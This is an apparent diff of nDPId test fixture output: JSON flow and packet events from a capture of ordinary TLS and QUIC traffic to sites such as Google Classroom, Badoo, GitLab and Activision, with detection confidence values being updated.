MGvFe3nB6Pz2LOpDsj\/3ZN3caT5Nt0nSv8HN+DYWZc+2JmBlBY71FJ57bmTqruFnoZ\/GjM0BGxB5WlpJ0M3zE3M16k0p8WRYGK3bOkXFB5rtEix709VUri+WnB1ivvzP4A8iO977JvKVGlPddOYZ4k7qZne6v\/jb1y0P5AatOM7YYIeRI7u8jf\/xM8RY8UTL\/Pv+EQzBcgac+DyXJSt\/sJo+Uuz0dGCYpa4Aa01DbWUiA5x+j4g5WT5LGdKrytMkGgkIcVSlNAt4nWOQc2IroqJjfmf+NbusGe\/Gviz5jV93bOaTFv7sGyuvESP0iH2MD2mwPgizF6t5EabtXWaevGbit0evQ9O3bHeRpQwTlwh0hRD7WqrIf0Wri9spAJN53856UKZFRupvrVqTH40ht5wGl2g3HXmJvEKnWBsD1hEB3sacVd4lWjKim62JMTY6yUmMhRBlNu2AupnyFsChUJ1NgsRbg5cQPowXRIBVG8WcjCs7OHKUH\/zza5xjXEz1FrdKQASDLCvFyh9YUzlRmDx7d99nX5vf9AwJejikY1uel\/yRMHcT9IqYO0kZBeGiX2ZDJD7vD1sF+05Qq++ztAL3CTqhuU\/7KSbWKiGOoFGj9phj6fZiE+g9e7+HIVuvPAKr+aSbxS71gHelt+hKMcDj7jdDFk5P6TqQdUXfqrnN38RDusNZmvWB+23Sj9NvIjlpua1MtXRWVJaLY5mX9AL1kTENCHtxomZwiXSqkSWtzS8dZocOlqjfWrd2hnw5yl8b7T0843OsmN6ZOoho4X9bhFw\/52C+NFDBAC42\/6jsH2i4NdbJBqOAuf4tLWi3oaJ\/0r5Y0wWyVnBbFtq1sx6d6EHxqir52O50dkkD8SF7j+wGSCG2L1l5bcQGnAqpzpZNB8AgofMTbrgYgdYIyrh\/neffOlCQyXy2EgLb\/xWEt+QftF8p5n2FzevDADqTCGGVeWULgrEsb\/3qULNf4uZHaY4HBD6To7yTuITvaXdqFt30MJBKnhBexi0dhA\/MGpMyVJfR\/PhbhWZmiNdx\/LRAV2Semg\/nPWe+DzSBBXm7wJXZiE\/8ewkRVdkujJi\/QhXAX0aOL76X77YYeny\/V35WiIqUmuxRHrBRdP5AMMQo
\/adJoX4bzVdEvw3cGw7\/\/hO2VzwL5m0trABzWAWdjRjsrTEu\/mWAVCZDP5\/peoG8YXeXsdHWwpRLyNJpzOlRz5aND24Jgn5x2v3PqoD5RBiIEHwD8jlV2fRCZXq1e7tPV6eLhSI74="} -00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":315,"source":"sites.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643355518166,"flow_last_seen":1643355518166,"flow_idle_time":200000,"flow_min_l4_payload_len":1250,"flow_max_l4_payload_len":1250,"flow_tot_l4_payload_len":1250,"flow_avg_l4_payload_len":1250,"midstream":0,"thread_ts_msec":1643355518166,"l3_proto":"ip4","src_ip":"192.168.1.123","dst_ip":"216.58.209.46","src_port":59102,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleClassroom","breed":"Safe","category":"Collaborative"},"quic": {"client_requested_server_name":"classroom.google.com","user_agent":"Chrome\/97.0.4692.99 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3","ja3":"a27a03a8478393fe7f8958648bb71ff4","tls_supported_versions":"TLSv1.3"}} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":316,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1642584017659,"flow_last_seen":1642584019409,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6590,"flow_avg_l4_payload_len":219,"midstream":0,"thread_ts_msec":1643355518166,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AccuWeather","breed":"Fun","category":"Web"}} 
+00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":315,"source":"sites.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643355518166,"flow_last_seen":1643355518166,"flow_idle_time":200000,"flow_min_l4_payload_len":1250,"flow_max_l4_payload_len":1250,"flow_tot_l4_payload_len":1250,"flow_avg_l4_payload_len":1250,"midstream":0,"thread_ts_msec":1643355518166,"l3_proto":"ip4","src_ip":"192.168.1.123","dst_ip":"216.58.209.46","src_port":59102,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleClassroom","breed":"Safe","category":"Collaborative"},"quic": {"client_requested_server_name":"classroom.google.com","user_agent":"Chrome\/97.0.4692.99 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3","ja3":"a27a03a8478393fe7f8958648bb71ff4","tls_supported_versions":"TLSv1.3"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":316,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1642584017659,"flow_last_seen":1642584019409,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6590,"flow_avg_l4_payload_len":219,"midstream":0,"thread_ts_msec":1643355518166,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AccuWeather","breed":"Fun","category":"Web"}} 
00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":316,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":316,"packets-processed":315,"total-skipped-flows":0,"total-l4-payload-len":129271,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":9,"total-updates":0,"current-active-flows":1,"total-active-flows":9,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":71,"global_ts_msec":1646482623895} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":316,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482623895,"flow_last_seen":1646482623895,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482623895,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1646482623895,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482623895,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8U5dAAEAGwa7AqAGAH95DcIjuAbuZU7+5AAAAAKAC+vB+rAAAAgQFtAQCCAqYsCyFAAAAAAEDAwc="} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1646482623937,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646482623937,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADIGI04f3kNwwKgBgAG7iO5SHRbemVO\/uoASa9CRawAAAgQFUAEBBAIBAwMH"} 01155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1646482623941,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646482623941,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItU5lAAEAGv7vAqAGAH95DcIjuAbuZU7+6Uh0W31AYAfZFAQAAFgMBAgABAAH8AwM7S+zQhzGHYgeM16HLoV5Lvv0qFp3\/Q9lLhcf6NGzgACCV4MycI1TbPUTQp0gTtBJdGxhCWPX0NxBb4Keh1UEhIQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAASABAAAA13d3cuYmFkb28uY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIDy\/wV7uHvn89KVxoNawBj6O\/1N7J\/Rv6ROuT\/L2i752ABcAQQR8rtiFUa3yYRs4u6Ro\/84M9BXHGtIJp6HdzCSQRE\/jjRMPOqb5+WU5M\/Rwa3rXtSAPp6MS0Mul28MptoKZ2BK0ACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
-00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482623895,"flow_last_seen":1646482623941,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482623941,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Badoo","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.badoo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00934{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":319,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482623895,"flow_last_seen":1646482623982,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":474,"midstream":0,"thread_ts_msec":1646482623982,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Badoo","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.badoo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":320,"source":"sites.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643355518166,"flow_last_seen":1643355518166,"flow_idle_time":200000,"flow_min_l4_payload_len":1250,"flow_max_l4_payload_len":1250,"flow_tot_l4_payload_len":1250,"flow_avg_l4_payload_len":1250,"midstream":0,"thread_ts_msec":1646482623982,"l3_proto":"ip4","src_ip":"192.168.1.123","dst_ip":"216.58.209.46","src_port":59102,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleClassroom","breed":"Safe","category":"Collaborative"}} +00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482623895,"flow_last_seen":1646482623941,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482623941,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Badoo","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.badoo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00934{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":319,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482623895,"flow_last_seen":1646482623982,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":474,"midstream":0,"thread_ts_msec":1646482623982,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Badoo","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.badoo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":320,"source":"sites.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643355518166,"flow_last_seen":1643355518166,"flow_idle_time":200000,"flow_min_l4_payload_len":1250,"flow_max_l4_payload_len":1250,"flow_tot_l4_payload_len":1250,"flow_avg_l4_payload_len":1250,"midstream":0,"thread_ts_msec":1646482623982,"l3_proto":"ip4","src_ip":"192.168.1.123","dst_ip":"216.58.209.46","src_port":59102,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleClassroom","breed":"Safe","category":"Collaborative"}} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":320,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482634412,"flow_last_seen":1646482634412,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482634412,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1646482634412,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482634412,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ehBAAEAGVvPAqAGArEH7TtLuAburPYAuAAAAAKAC+vCVcQAAAgQFtAQCCAoaoTMuAAAAAAEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1646482634431,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646482634431,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADkG2AusQftOwKgBgAG70u5kgyMxqz2AL4AS\/\/99tgAAAgQFeAEBBAIBAwMK"} 
01152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1646482634434,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646482634434,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItehJAAEAGVQDAqAGArEH7TtLuAburPYAvZIMjMlAYAfajwgAAFgMBAgABAAH8AwNOB4Gzi6+YArAvzkfwrorK9DEddM7BFl3e3mWx5EKfGSCorzDjbh21t2eWZKubSdOdkcLfUyHi+FUzEXYnC03sBQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAATABEAAA53d3cuZ2l0bGFiLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACA5FC8LVJQpX7CGnPMJyGCVSqmP\/UlOQqTKt4aSCzonPAAXAEEEf41WX9lKjs6LoM+3mxjeublwFG7G1\/kkw4gmsHPLzdToe\/hXlsiK3SyaMLeOC3M5q1ZNvI72xevTMYH\/wlBkVwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482634412,"flow_last_seen":1646482634434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482634434,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GitLab","breed":"Fun","category":"Collaborative"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.gitlab.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":323,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482634412,"flow_last_seen":1646482634459,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646482634459,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GitLab","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.gitlab.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482634412,"flow_last_seen":1646482634434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482634434,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GitLab","breed":"Fun","category":"Collaborative"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.gitlab.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":323,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482634412,"flow_last_seen":1646482634459,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646482634459,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GitLab","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.gitlab.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482646628,"flow_last_seen":1646482646628,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482646628,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1646482646628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482646628,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8eQxAAEAGb\/bAqAGAAhGNgKZUAbv+Ru5OAAAAAKAC+vDfwAAAAgQFtAQCCAp7uQs2AAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1646482646646,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482646646,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgG8QICEY2AwKgBgAG7plR0ThXR\/kbuT6AS\/oh2XAAAAgQFtAQCCAqpkTIKe7kLNgEDAwc="} 01165{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1646482646648,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482646648,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5eQ5AAEAGbffAqAGAAhGNgKZUAbv+Ru5PdE4V0oAYAfbaKAAAAQEICnu5C0qpkTIKFgMBAgABAAH8AwMSh5Kk8yD8gdWVB2YFzzg9KRBCWJ\/pzlApBrokxgf2OCBs84UpHDw4uY4jKpCVZJzZAhJUrEs0AlJ7gTtfJSwiWgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAXABUAABJ3d3cuYWN0aXZpc2lvbi5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAg40qefHDImQJEkibGm9hnpGwl44lKo4KOQS8qsLRSATsAFwBBBPNBVrG5A+ZLqrow1aQOaEgsW+53RcPAplpAt8ULtljoAJH8CjL7YTSZ+PIOiRhMhirRlex47cXc5PiOAFYE9T0AKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482646628,"flow_last_seen":1646482646648,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482646648,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.activision.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":327,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482646628,"flow_last_seen":1646482646665,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482646665,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.activision.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
